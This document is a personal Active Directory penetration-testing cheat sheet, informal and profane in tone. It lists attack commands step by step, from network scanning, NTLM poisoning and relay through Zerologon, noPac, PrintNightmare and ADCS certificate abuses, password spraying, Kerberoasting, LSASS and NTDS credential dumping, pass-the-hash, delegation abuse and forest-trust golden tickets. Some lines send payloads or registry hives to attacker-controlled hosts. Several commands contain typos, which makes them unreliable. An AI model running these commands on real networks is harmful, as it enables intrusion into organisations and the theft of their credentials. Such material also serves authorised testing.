a NON linear C by C.
typically I export all required variables. will list all vars and set tool resource list in near future.
Thank you,
- gary --- HELL YEAH I GOT YOUR BACKNo Creds/Scanning
Scan Network
- # enumerate SMB Hosts
- cme smb {ip_range}
- # NMAP
- nmap -sP -p {IP} # PING SCAN
- nmap -PN -sV --top-ports 50 --open {IP} # QUICK SCAN
- nmap -PN --script smb-vuln* -p139,445 {IP} # SMB SCAN
- nmap -PN -sC -sV -oA {output_file} {IP} # CLASSIC SCAN
- nmap -sU -sC -sV -oA {output_file} {IP} # UDP SCAN
- nmap -PN -sC -sV -p- -oA {output_file} {IP} # FULL SCAN
- # DC IP
- nmcli dev show eth0 # DOMAIN & DNS
- nslookup -type=SRV _ldap._tcp.dc._msdcs.{domain_name}
- # ZONE
- dig axfr {domain} @{name_server}
- # SMB CHECK GUEST ACCESS
- enum4linux -a -u ""-p"" {dcip}&&
- enum4linux -a -u "guest" -p ""{dcip}
- smbmap -u ""-p"" -P 445 -H {dcip} &&
- smbmap -u "guest" -p "" -P 445 -H {dcip}
- smbclient -U '%' -L //{IP} && smbclient -U 'guest%' -L //{IP}
- # CHECK FOR NULL SESSIONS
- cme smb {IP} -u " -p"
- # CHECK ANONYMOUS
- cme smb {IP} -u 'a' -p"
- # COERCE
- PetitPotam.py -d {domain} {listener} {target}
- # LDAP ENUMERATION
- nmap -n -sV --script "ldap" and not brute" -p 389 {dcip}
- ldapsearch -x -h {IP} -s base
- # POISON
- responder -l eth0 # DISABLE SMB AND HTTP RELAY?
- mitm6 -d {domain} # IPV6
- bettercap # ARP
- # USERLIST ENUMERATION
- enum4linux -U {dcip} | grep 'user:'
- cme smb {IP} --users
- net rpc group members 'Domain Users' -W '{domain}' -l '{IP}' -U '%'
- # OSINT - internet ENUMERATION
- nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='{domain}', userdb={userlist}" {ip_address}
Known Compromission methods
quick CVE
- # ZERO LOGON (CVE-2020-1472)
- zerologon-scan '{netbios_dc_name}' '{IP}'
- python3 cve-2020-1472-exploit.py {BIOS_NAME} [IP]
- secretsdump.py {DOMAIN}/{MACHINE_BIOS_NAME}\S -no-pass -just-dc-user "Administrator"
- secretsdump.py -hashes :{HASHADMIN} {DOMAIN}/Administrator@{IP}
- python3 restorepassword.py -target-ip {IP} {DOMAIN}/{BIOSNAME}@{BIOSNAME} -hexpass {HEX_PASSWORD}
- # ETERNAL BLUE MS17-010
- "exploit/windows/smb/ms17_010_eternalblue"
- # SYSVOL & GPP MS14-025
- use scanner/smb/smb_enum_gpp
- findstr /S /l cpassword \\{FQDN}\sysvol\{FQDN}\policies\*.xml
- # TOMCAT/JSBOSS
- auxiliary/scanner/http/tomcat_enum
- exploit/multi/http/tomcat_mgr_deploy
- # JAVA RMI
- exploit/multi/misc/java_rmi_server
- # JAVA SERIALIZED PORT
- ysoserial
- # SEARCHSPLOIT?
- # PROXYLOGON
- # PROXYSHELL
- # log4shell
- $(indi:ldap//{IP}:{PORT}/o=reference) rogueJndi-1.0.jar
USERNAME ENUM
password SPRAY
- # Got password policy
- cme {IP} -u 'user' -p 'password' --pass-pot
- enum4linux -u 'username' -p 'password' -P {IP}
- Get-ADDefaultDomainPasswordPolicy
- Get-ADFineGrainedPasswordPolicy -filter *
- FGPP
- GetADUserResultantPasswordPolicy -Identify {USER}
- ldapsearch-add.py --server '{DCIP}' -d {DOMAIN} -u {USER} -p {PASS} --type pass-pois
- # CLEAR TEXT CREDENTIALS FOUND
- cme smb {DCIP} -u user.txt -p password.txt --no-bruteforce # test user=password
- cme smb {DCIP} -u user.txt -p password.txt
- sprayhound -U users.txt -d {DOMAIN} -dc {DCIP}
ASREP Roast
- # needs CREDENTIALS
- Get ASREPRoastable users
- Get-DomainUser -PreauthNotRequired -Properties {SAM}
- MATCH (u:User {dontreqpreauth:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
- # Get hash
- python GetNPUsers.py {DOMAIN}/ -userfile {usernames.txt} -format hashcat -outputfile {DOMAINHASHES.txt}
- Rubeus.exe asreproast /format:hashcat
- # BLIND KERBEROASTING
- Rubeus.exe kerberoast /domain:{DOMAIN} /dc:{DCIP} /nopreauth: {ASREPUSER} /spns:{USERS.txt}
- GetUserSPNs.py -no-preauth "{ASREPUSER}" -usersfile "{USERLIST.txt}" -dc-host "{DCIP}" "{DOMAIN}"/
- # CVE-2022-33679
- python3 CVE-2022-33679.py {DOMAIN}/{USER}{TARGET}
MITM
LISTEN
- # Listen
- responder -l eth0
- smbclient.py
RELAY
- # NTLM RELAY
- SMB -> LDAP
- ntlmrelay.py --remove-mic --escalate-user {USER} -t ldap://{DCIP} -smb2support
- ntlmrelay.py -t ldaps://{DCIP} --remove-mic --add-computer {COMP} {COMPPASS} --delegate-access -smb2support
- HTTPS -> LDAP
- ntlmrelayx -t ldap://{DCIP} --shadow-credentials --shadow-target '{DCIP}'
- SMB
- FIND NOT SIGNED
- nmap -Pn -ss -T4 --open --script smb-security-mode -p445 {ADDRESS}/{MASK}
- unsigned
- ntlmrelayx.py -wh {ATTACKIP} -t smb://{TARGET} -l /tmp-6-debug
- ntlmrelayx.py -lf {TARGETS} -smb2support -socks(-6)
- MSSQL
- RELAY TO MSSQL
- ntlmrelayx.py -t mssql://{IP} -smb2support -socks
- SMB -> Netlogon
- ZERO-LOGON (CVE-2020-1473)
- FROM dc01 -> dc02
- ntlmrelayx.py -t dcsync://{DC02IP} -smb2support -auth-smb {USER}:{PASSWORD}
- ARP
- WSUS
- pywsus.py
PRIVILEGE ESCALATION
LOW ACCESS
- # Get Applocker info
- Get-Children -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe (dll/msi/...)
- winpeas.exe
- # AMSI Bypass
- https://amsi.fail/
- Reflection
- Patch amsi.dll
- # SEARCH PASSWORD FILES
- findstr /si 'password'*.txt*.xml*.docx
- # APPLOCKER BYPASS
- use c:\Windows\Tasks
- use C:\Windows\Temp
- # POWERSHELL CLM BYPASS
- installutil.exe /logfile=/LogToConsole=false /U C:\runme.exe
- mshta.exe my.hta
- msbuild
- # USER ACCESS CONTROL BYPASS
- WSReset
- FodHelper
- MSDT
- SMBGhost CVE-2020-0796
- CVE-2021-36934(HiveNightmare/SeriousSAM)
- # SERVICE YOUR MAFUCKING ACCOUNT
- RoguePotato
- JuicyPotato/Lovely Potato
- PRINTSPOOFER
- # KrBRelayUp
- .\KrbRelayUp.exe relay -Domain {DOMAIN} -CreateNewComputerAccount -ComputerName {COMPUTER} -ComputerPassword {PASSWORD}
- .\KrbRelayUp.exe spawn -m rbcd -d {OM} dc {DCIP} -cn {COMPUTER} -cp {COMPUTERPASS}
KNOWN VULNS
Game over
- # MS14-068
- FindSMB2UP.py {IP}
- rpcclient $> lookupnames {NAME} wmic useraccount get name,sid
- auxiliary/admin/kerberos/ms14_068_kerberos_checksum
- goldenPac.py -dc-ip {DCIP} {DOMAIN}/{USER}:'{PASSWORD}'{TARGET}
- # Privexchange (CVE-2019-0724, CVE-2019-0686)
- python privexchange.py -ah {TARGET} {EXCHANGE} -u {USER} -d {DOMAIN} -p {PASSWORD}
- # SamAccountName / nopac CVE-2021-42287/CVE-2021-42278
- SCAN
- cme smb {IP} -u {USER} -p {PASSWORD} -M nopac bitch
- .\noPac.exe -domain {DOMAIN} -user {USER} -pass {PASS} /dc {DCFQDN} /mAccount {MACHINE} /mPassword {MACHINE_PASSWORD} /service cifs /ptt
- WITH IMPACKET
- addcomputer.py /addspn.py / renameMachine.py / getTGT.py / renameMachine.py / getST.py
- # PRINTNIGHTMARE CVE 2021-1675 / CVE-2021-34527
- CVE-2021-1675.py {DOMAIN}/{USER}:{PASSWORD}@{TARGET} '\\{SMB_SERVER_IP}\{SHARED}\inject.dll
- # CERTI FRIED CVE-2022-26923
- certipy account create -u {USER}@{DOMAIN} -p '{PASSWORD}' -user 'CERTI-FRIED-PC' -pass 'CERTI-FRIED-PASS' -dns '{FQDN}'
- certipy req -u 'certi-fried-pc'@{DOMAIN} -p'CERTIFRIEDPASS' -target {CAFQDNS} -template MACHINE
- certipy auth -pfx {FILE} -username '{DC}$' -domain {DOMAIN} -dc-ip {DCIP}
HAVE VALID CREDS
GET AUTH
- # GET USERS
- GetADUsers.py -all -dc-ip {DCIP} {DOMAIN}/{USERNAME}
- cme smb {IP} -p '{PASSWORD}' --users
- # ENUM SMB SHARED
- cme smb {IP} -u {USER} -p {PASSWORD} --shares
- # BLOODHOUND
- bloodhound-python -d {DOMAIN} -u {USER} -p {PASSWORD} -gc {DCIP} -c all
- ./rusthound -d {DOMAIN_TARGET} -u '{USER}@{DOMAIN}' -p '{PASSWORD}' -o {OUT} -z
- import-module sharphound.ps1;invoke-bloodhound -collectionmethod all -domain {DOMAIN}
- sharphound.exe -c all -d {DOMAIN}
- # ADPEAS
- # PINGCASTLE
- # POWERVIEW
- # KERBERROASTING
- Get ROASTABLE users
- Get-Domain -SPN -Properties SamAccountName, ServicePrincipleName
- MATCH (u:User {hasspn:true}) RETURN u
- MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p
- Get HASH
- GetUserSPNs.py -request -dc-ip {DCIP} {DOMAIN}/{USER}:{PASSWORD}
- Rubeus kerberoast
- Enum DNS
- dnstool.py -u '{DOMAIN}\user' -p '{PASSWORD}' --record '*' --action query {DCIP}
- ENUM ADCS
- certipy find -u '{DOMAIN}\user' -p '{PASSWORD}' -dc-ip {DOM-CONTROLLER}
- COERCE
- rpcdump.py {DOMAIN}/{USER}:{PASSWORD}@{DOM-SERVER} | grep MS-RPRN
- printerbug.py '{DOMAIN}/{USERNAME}:{PASSWORD}@{PRINTERIP} [LISTENER]
- PetitPotam.py -d {DOMAIN} -u {USER} -p {PASSWORD} {LISTENER} {TARGET}
- coercer.py -u {USER} -d {DOMAIN} -p {PASSWORD} -t {TARGET} -l {LISTENER}
HASH CRACKING
CRACKING LIST
- # MsCache2
- hashcat -m 2100 -a 0 mscache-hash rockyou.TEXT
- # KERBEROS ASREP
- hashcat -m 18200 -a 0 AS-REP_roast-hashes rockyou.TEXT
- # KERBEROS 5 TGS AES256
- hashcat -m 19700 -a 0 fuck.txt rockyou.TEXT
- # KERBEROS 5 TGS AES128
- hashcat -m 19600 -a 0 fuck.txt rockyou.TEXT
- # KERBEROS 5 TGS
- hashcat -m 13100 -a 0 fuck.txt rockyou.TEXT
- john fuck.txt --format=krb5tgs --wordlist=rockyou.TEXT
- # NetNTLMv2
- john --format=netntlmv2 hash.TEXT
- hashcat -m 13100 -a 0 fuck.txt rockyou.TEXT
- # NetNTLMv1
- "crack.sh"
- john --format=netntlm hash.TEXT
- hashcat -m 5500 -a 3 hash.TEXT
- # NTLM
- john --format=nt hash.TEXT
- hashcat -m 1000 -a 3 hash.TEXT
- # LM
- john --format=lm hash.TEXT
- hashcat -m 3000 -a 3 hash.TEXT
- HELL YEAH
GOT ADMIN
ADMIN ACCESS
- # EXTRACT FROM LSASS
- # PROTECTED
- PPLdump64.exe {LSASS.EXE OR LSASS.PID} lsass.dmp
- mimikatz "!+" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process::lsass.exe" "!-"
- procdump.exe -acceptula -ma lsass.exe lsass.dmp
- mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurisa::logonPasswords" "exit"
- mimikatz "privilege::debug" "token::elevate" "sekurisa::logonpasswords" "exit"
- load kiwi creds__all
- cme smb {RANGE} -u {USER} -p {PASSWORD} -M isassy
- isassy -d {DOMAIN} -u {USER} -p {PASSWORD} {IP}
- # EXTRACT SAM
- hashdump
- reg save HKLM\SAM {FILE}; reg save HKLM\SECURITY {FILE};reg save HKLM\SYSTEM {FILE}
- secretsdump.py -system SYSTEM -same SAMLOCAL
- SHADOW
- diskshadow list shadows all
- mklink /d c:\shadowcpy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCpy1\
- mimikatz "privilege::debug" "lsadump::sam" "exit"
- secretdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- reg.py {DOMAIN}/{USER}:{PASSWORD}@{IP} backup -o '\\SMB-IP\share'
- secretsdump.py -security {FILES} system {SYS-FILE} LOCAL
- # LSA
- cme smb {RANGE} -u {USERS} -p '{PASSWORDS}' --lsa
- secretsdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- reg.py {DOMAIN}/{USER}:{PASSWORD}@{IP} backup -o '\\SMB-IP\share'
- secretsdump.py -security {FILES} system {SYS-FILE} LOCAL
- # DPAPI
- DonPAPI.py {DOMAIN}/{USER}:{PASSWORD}@{TARGET}
- mimikatz.exe "sekurlsa::dpapi"
- secretsdump.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- # SEARCH PASSWORD FILES
- findstr /si 'password' *.txt *.xml *.docx
- # SEARCH STORED PASSWORDS
- lazagne.exe all
- CHROME
- %appdata%\Local\Google\Chrome\User Data\Default
- SharpChromium.exe
MOVE PERMISSIONS
ACL/ACE
- # dsync
- mimikatz lsadump::dsync /domain:{TARGET} /user:{DOMAIN}\administrator
- secretsdump '{DOMAIN}'/'{USER}':'{PASSWORD}'@'{DOMAIN CONTROLELR}
- # Can you change "msDS-KeyCredentialLink (WRITE) + ACDS"?
- whisker.exe
- certipy shadow auto '-u {USER}@{DOMAIN}' -p {PASSWORD} -account '{TARGET}'
- pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERT_PASSWORD" --target "TARGET_SAM" --action "list"
- # ON GROUP
- ALL PERMISSIONS
- net group "{GROUP}" {ME} /add /domain
- # ACIPWN.py
- acitoolkit {DOMAIN}/{USER}:'{PASSWORD}@{TARGET} get-objectacl [ -all | -object {OBJECT}]
- can read LAPS
- MATCH p=(g:Group)-[:ReadLAPSPassword]->(c:Computer) RETURN p
- # GET LAPS
- Get-LAPSPASSWORDS -DomainController {DCIP} -Credential {DOMAIN}\{LOGIN} | Format-Table -AutoSize
- foreach ($objResult in $colResults)($objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}})
- cme ldap {DCIP} -d {DOMAIN} -u {USER} -p {PASSWORD} --module laps
- # GPO check
- SID Principles
- Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=HELLYEAH,DC=com" -ResolveGUIDS | ? {$_.ObjectAceType -eq "Group-Policy-Container"} | select Object|DN,ActiveDirectoryRights,SecurityIdentifier | fl
- GET WRITE PRINCIPLES(GP-LINK ATTR ON OU)
- Get-DomainOU | Get-DomainObject -ResolveGUIDs | ? {$_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty"} | select ObjectDN, SecurityIdentifier | fl
WEAK ADCS CONFIG
CONFIGURATION
- # Web ENROLLMENT
- ESC8
- ntlmrelayx.py -t http://{DCIP}/certsrv/cerfnsh.asp -debug -smb2support --adcs --template DomainController
- Rubeus.exe aasktgt /user:{USER} /certificate:{BASE64-CERTIFICATE} /ptt
- gettgtpkinit.py -pfx -base64 $(cat cert.bs64) {DOMAIN}/{DCNAME}$ {CACHEDFILE}
- certipy relay -ca {CAIP} -template DomainController
- certipy auth -pfx {CERTIFICATE} -dc-ip {DCIP}
- # TEMPLATE INFO
- certutil -v -dsTemplate
- certify.exe find [/VULN]
- certipy find -u {USER}@{DOMAIN} -p {PASSWORD} -dc-ip {DOMAINCONTROLLER}
- ESc1 CERT FROM VULN TEMPLATE
- certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULNTEMPLATENAME}' -ca {CANAME} -upn {TARGET}@{DOMAIN}
- certify.exe request /ca:{SERVER}\{CANAME} / template:"{VULNTEMPLATENAME}" [/altname:"Admin"]
- ESc3 USE AGENT
- certify.exe request /ca:{SERVER}\{CANAME} / template: "{VULN TEMPLATE NAME}"
- certify.exe request request /ca:{SERVER}\{CANAME} /template:{TPL} /onbehalfof:{DOMAIN}\{USER} /enrollcert:{PATH.PFX} [/enrollcertpw:{CERTPASSWORD}]
- certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULN TEMPLATE NAME}' -ca {CANAME}
- certipy req -u {USER}@{DOMAIN} -p {PASSWORD} -target {CASERVER} -template '{VULN TEMPLATE NAME}' -ca {CANAME} -on-behalf-of '{DOMAIN}\{USER}' -pfx {CERT}
- # getACL INFO
- certipy find -u {USER}@{DOMAIN} -p {PASSWORD} -dc-ip {DOMAIN}
- MIOSCONFIGURATION?
- ESc4
- write privs on cert
- certipy template -u {USER}@{DOMAIN} -p'{PASSWORD}' -template "{VUL TEMPLATE NAME}" -sasve-old-debug
- ESC7
- MANAGE CA?
- certipy ca -ca {CANAME} -add-officer '{USER}' -username {USER}@{DOMAIN} -password {PASSWORD}
- Manage CERTIFICATE?
- certipy ca -ca {CANAME} -enable-template '{ESC1 VULN TPL}' -username {USER}@{DOMAIN} -password {PASSWORD}
- certipy req -username {USER}@{DOMAIN} -password {PASSWORD} -ca {CANAME} -template "{VULN TEMPLATE NAME}" -upn {TARGET}
- REQUEST ISSUE
- certipy ca -u {USER}@{DOMAIN} -p '{PASSWORD}' -ca "{CANAME}" -issue-request {REQ_ID}
- certipy req -u {USER}@{DOMAIN} -p '{PASSWORD}' -ca {CANAME} -retreive {REQ_ID}
- # CA INFO
- certutil -TCAinfo
- certify.exe cas
- # Get CA flags
- certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
- certipy / certify.exe
- MIOSCONFIGURATION?
- abuse attr set flag on me
- # GET PKI OBJ
- certify.exe pkiobjects
- # CERT MAPPING
- certipy shadow auto -username {ACCOUNTa}@{DOMAIN} -p {PASSa} -account {ACCOUNTb}
- ESC9/ESC10
- certipy account update -username {ACCOUNTa}@{DOMAION} -password {PASSa} -user {ACCOUNTb} -upn Administrator
- ESC9
- certipy req -username {ACCOUNTb}@{DOMAIN} -hashes {HASHb} -ca {CANAME} -template {VULN TEMPLATE}
- ESC10
- certipy req -username {ACCOUNTb}@{DOMAIN} -hashes {HASHb} -ca {CANAME} -template {ANY TPL WITH AUTH}
- ESC10
- certipy account update -username {ACCOUNTa}@{DOMAIN} -password {PASSa} -user {ACCOUNTb} -upn '{DCNAME}@{DOMAIN}
- RESET ACCOUNT B UPN
- certipy account update -username {ACCOUNTa}@{DOMAIN} -password {PASSa} -user {ACCOUNTb} -upn {ACCOUNTb}@{DOMAIN}
LATERAL MOVEMENTS
barbra streisand
Lateral movement is a technique that adversaries use, after compromising an endpoint, to extend access to other hosts or applications in an organization. Lateral movement helps an adversary maintain persistence in the network and move closer to valuable assets.
- # WSUSpect
- WSUSpendu.ps1
- # SCCM
- abuse
- SharpSCCM
- PowerSCCM
- CMPivot
- # MSSQL
- find access
- cme msql {IP} -u {USER} -p {PASSWORD} -d {DOMAIN}
- Users with SQL ADMIN
- MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p
- SPCONFIGURE execute
- EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
- EXECUTE sp_configre 'xp_cmdshell', 1; RECONFIGURE;
- EXEC xp_cmdshell '{COMMANDS}'
- TRUST LINK
- Get-SQLServerLinkCrawl -username {USER} -password {PASS} -Verbose -Instance {SQL_INSTANCE} -Query "{THE_QUERY}"
- mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}
- enum_db
- enable_xp_cmdshell
- xp_cmdshell {COMMAND}
- enum_impersonate
- exec_as_user {USER}
- exec_as_login {LOGIN}
- xp_dir_tree {IP}
- trustlink
- sp_linkedservers
- use_link
- # LOCAL USER
- cme smb -u {USER} -p {PASSWORD}'{IP} --local-auth
- impacket like cleartext password without domain
- # PASSWORDS
- INTERACTIVE-SHELL
- psexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- psexec.exe -AcceptEULA \\{IP}
- mimikatz "privilege::debug sekurlsa::pth /user:{USER}/domain:{DOMAIN} /ntlm:{HASH}"
- PSEUDO SHELL
- atexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}"COMMAND TO EXEC"
- smbexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- wmiexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- dcomexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} -d {DOMAIN}
- crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} -local-auth
- WINRM
- evil-winrm -i {IP} -u {USER} -p {PASSWORD}
- RDP
- xfreerdp /u:{USER} /d:{DOMAIN} /p:{PASSWORD} /v:{IP}
- SMB
- smbclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- MSSQL
- crackmapexec mssql {RANGE} -u {USER} -p {PASSWORD}
- mssqlclient.py -windows-auth {DOMAIN}/{USER}:{PASSWORD}@{IP}
- # PTH
- INTERACTIVE SHELL
- psexec.py -hashes ":{HASH}" {USER}@{IP}
- psexec.exe -AcceptEULA \\{IP}
- mimikatz "privilege::debug sekurlsa::pth /user:{USER} /domain:{DOMAIN} /ntlm:{HASH}"
- PSEUDO SHELL
- atexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}"COMMAND TO EXEC"
- smbexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- wmiexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- dcomexec.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
- crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} -d {DOMAIN}
- crackmapexec smb {RANGE} -u {USER} -p {PASSWORD} -local-auth
- WINRM
- evil-winrm -i {IP} -u {USER} -H {HASH}
- RDP
- reg.py {DOMAIN}/{USER}@{IP} -hashes ':{HASH}' add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v 'DisableRestrictedAdmin' -vt 'REG_DWORD' -vd '0'
- SMB
- smbclient.py -hashes ":{HASH}" {HASH}@{IP}
- MSSQL
- crackmapexec mssql {RANGE} -H ":{HASH}"
- mssqlclient.py -windows-auth -hashes ":{HASH}" {DOMAIN}/{USER}@{IP}
- # PASS THE KEY
- Rubeus asktgt /user:victim /rc4:{VALUE}
- Rubeus ptt /ticket:{TICKET}
- Rubeus createnetonly /program:C:\Windows\System32\cmd.exe [upncont.exe]
- Rubeus ptt /luid:0xdeadbeef /ticket:{TICKET}
- getTGT.py {DOMAIN}/{USER} -hashes:{HASH}
- getTGT.py -aesKey '{KEY}' {DOMAIN}/{USER}@{IP}
- # KERBEROS
- PTT (PASS THE TICKET)
- convert
- ticketConverter.py {KIRB or CACHE} {CACHE OR KIRB}
- export KRB5CCNAME=/root/impacket-examples/domain_ticket.ccache
- mimikatz kerberos::pfc "{TICKET}"
- Rubeus.exe ptt /ricket:{TICKET}
- proxychains secretsdump -k '{DOMAIN}'/'{USER}'@'{IP}'
- MOD SPN
- tgssub.py -in {TICKET CCACHE} -out {NEWTICKET.CCACHE} -altservice "{SERVICE}/{TARGET}"
- AES
proxychains secretsdump -aesKey {KEY}'{DOMAIN}'/'{USER}'@'{IP}'
- # SOCKS
- proxychains lookupsid.py {DOMAIN}/{USER}@{IP} -no-pass -domain-sids
- proxychains mssqlclient.py -windows-auth {DOMAIN}/{USER}@{IP} -no-pass
- proxychains secretsdump -no-pass '{DOMAIN}'/'{USER}'@'{IP}'
- pseudo
- proxychains atexec.py -no-pass {DOMAIN}/{USER}@{IP} "COMMAND"
- proxychains smbexec.py -no-pass {DOMAIN}/{USER}@{IP}
- SMB SEARCH FILES
- proxychains smbclient.py -no-pass {USER}@{IP}
- # PFX CERT
- GET HASH NTLM
- certipy auth -pfx {CERT FILES} -dc-ip {DCIP}
- PTC
- pkinit
- gettgtpkinit.py -cert-pfx "{PFXFILES}" ^[-pfx-pass "{CERTPASSWORD}"] "{FQDN}/{USER}" "{TGT CACHE FILES}"
- Rubeus.exe asktgt /user:"{USERNAME}" /certificate:"{PFX FILE}" [/password:"{CERTIFICATE PASSWORD}"] /domain:"{FQDN DOMAIN}" /dc:"{DCIP}" /show
- certipy auth -pfx {CERTFILES} -dc-ip {DCIP}
- Schannel
- certipy auth -pfx {CERTFILES} -ldap-shell
- add_computer
- set_rbcd
DOMAIN Administrator
HELL YEAH
to make changes to global policies that impact all the computers and users connected to that Active Directory organization.
- # Domain admin
- dump ntlds.dit
- cme smb {DCIP} -u {USER} -p {PASSWORD} -d {DOMAIN} -ntds
- secretsdump.py '{DOMAIN}/{USER}:{PASSWORD}'@{IP}
- ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
- secretsdump.py -ntds ntds_file.dit -system SYSTEM_FILE -hashes lmhash:nthash LOCAL -outputfile ntlm-extract
- dpapi.py backupkeys -hashes ':{HASH}' -t Administrator@{DCIP} --export
- DonPAPI -pvk {BACKUPKEYS FOR THE DOMAIN.PVK} -H ':{HASH}' {DOMAIN}/{USER}@{IP_RANGE}
delegate Kerberos
delegations
Kerberos delegation is a delegation setting that allows applications to request end-user access credentials to access resources on behalf of the originating user.
- # NOCONSTRAINED
- get machines
- Get-NetComputer -Unconstrained
- Get-DomainComputer -Unconstrained -Properties DnsHostName
- MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
- MATCH (u:User {owned:true}), (c:Computer { unconstraineddelegation:true}), p=shortestPath((u)-[*l..]->(c)) RETURN p
- UAC: ADS_UF_TRUSTED_FOR_DELEGATION
- Get tickets
- privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export
- Rubeus dump /service:krbtgt /nowrap
- Rubeus dump /luid:0xdeadbeef /nowrap
- FORCE CONN
- Rubeus monitor /interval:5
- # CONSTRAINED
- Get-DomainComputer -TrustedToAuth -Properties DnsHostName, MSDS-AllowedToDelegateTo
- Get-DomainUser -TrustedToAuth
- MATCH (c:Computer), (t:Computer), p= ((c)-[:AllowedToDelegate]->(t)) RETURN p
- MATCH (u:User {owned:true}), (c:Computer {name:"{TARGET.FQDN}"}), p=shortestPath((u)-[*1..]->(c)) RETURN p
- # PROTOCOL TRANSITION
- Rubeus hash /password:{PASSWORD}
- Rubeus asktgt /user:{USER} /domain:{DOMAIN} /aes256:{AES256HASH}
- Rubeus s4u /ticket:{TICKET} /impersonateuser:{ADMIN} /msdsspn:{CONTRAINT} /altservice:CIFS /ptt
- ALT
- HOST
- psexec \\\{TARGET} {COMMAND}
- HTTP
- Enter-Pssession -computername {TARGET}
- Invoke-Command {TARGET} -Scriptblock {{PUTS DA COMMAND HERE}}
- CIFS
- dir \\{TARGET}\c$
- LDAP CHECK
- # KERBEROS: without protocol transition
- RBCD
- addcomputer.py -computer-name '{RBC_COM}$' 0computer-pass '{RBCCOMPASS}' -dc-ip {DCIP} '{DOMAIN}/{USER}:{PASSWORD}
-rbcd.py -delegate-from '{RBCDCOM}$' -delegate-to '{CONSTRAINT}$' -dc-ip '{DCIP}' -action 'write' -hashes '{HASH}' {DOMAIN}/{CONSTRAINEDIP}$
- getST.py -self -impersonate "administrator" -dc-ip {DCIP} {DOMAIN}/{RBCDCON}$':'{RBCD_COMPASS}
- getST.py -spn host/{CONSTRAINED} -hashes "'{DOMAIN}/{COMPUTER TO IMPERSONATE}' -impersonate Administrator --dc-ip {DCIP} -additional-ticket {LAST TICKET}"
- getST.py -spn {CONSTRAINED_SPN}/{TARGET} -hashes '{HASH}' '{DOMAIN}/{CONSTRAINED}$' -impersonate Administrator --dc-ip {DCIP} -additional-ticket {LAST TICKET}
- # RBCD
- Object:msDS-AllowedToActOnBehalfOfOtheridentit
- rubeus.exe hash /password:{COMPUTER PASS} /user:{COMPUTER} /domain:{DOMAIN}
- rubeus.exe s4u /user:{HELL-YEAH-COMPUTER$} /aes256:{AES256HASH} /impersonateuser: administrator /msdsspn:cifs/{VICTIM.DOMAIN} /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
- rbcd.py -delegate-from '{COMPUTER}$' -delegate-to '{TARGET}$' -dc-ip '{DCIP}' -action 'write' {DOMAIN}/{USER}:{PASSWORD}
- getST.py -spn host/{DCFQDN} '{DOMAIN}/{COMPUTER}:{COMPUTERPASS}' -impersonate Administrator --dc-ip {DCIP}
- add account
- addcomputer.py -computer-name '{COMPUTER}' -computer-pass '{PASSWORD}' -dc-host {DCIP} -domain-netbios {DOMAINNETBIOS} '{DOMAIN}/{USER}:{PASSWORD}'
TRUST RELATIONSHIP
FOREST and FOREST
To allow users in both Forest 1 and Forest 3 to share resources, a two-way transitive trust must be created between the two forests. If a one-way forest trust is created between two forests, members of the trusted forest can utilize resources located in the trusting forest.
- # ENUM
- ntltest.exe /trusted_domain
- ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
- Get-DomainTrust -domain {DOMAIN}
- Get-DomainTrustMapping
- # FOREST COMPROMISE
- Get-DomainSID -Domain {DOMAIN}
- Get-DomainSID -Domain {TARGET}
- mimikatz lsadump::trust /patch
- mimikatz lsadump:dcsync /domain:{DOMAIN} /user:{DOMAIN}\krbtgt
- mimikatz kerberos::golden /user:Administrator /domain:{DOMAIN} /sid:{DOMAINSID} /aes256:{AES256TRUSTKEY} /sids:{TARGETSID}-519 /service:krbtgt /target:{TARGET} /ptt
- # FOREIGN
- foreign domain USER
- MATCH p=(n:User)-[:MemberOf]->(m:Group) WHERE n.domain="{DOMAIN}" AND m.domain<>n.domain RETURN p
- foreign domain GROUP
- MATCH p=(n:Group {domain:"{DOMAIN}"})-[:MemberOf]->(m:Group) WHERE m.domain<>n.domain AND n.name<>m.name RETURN p
- Get-DomainForeignGroupMember -Domain {TARGET}
- convertfrom-sid {SID}
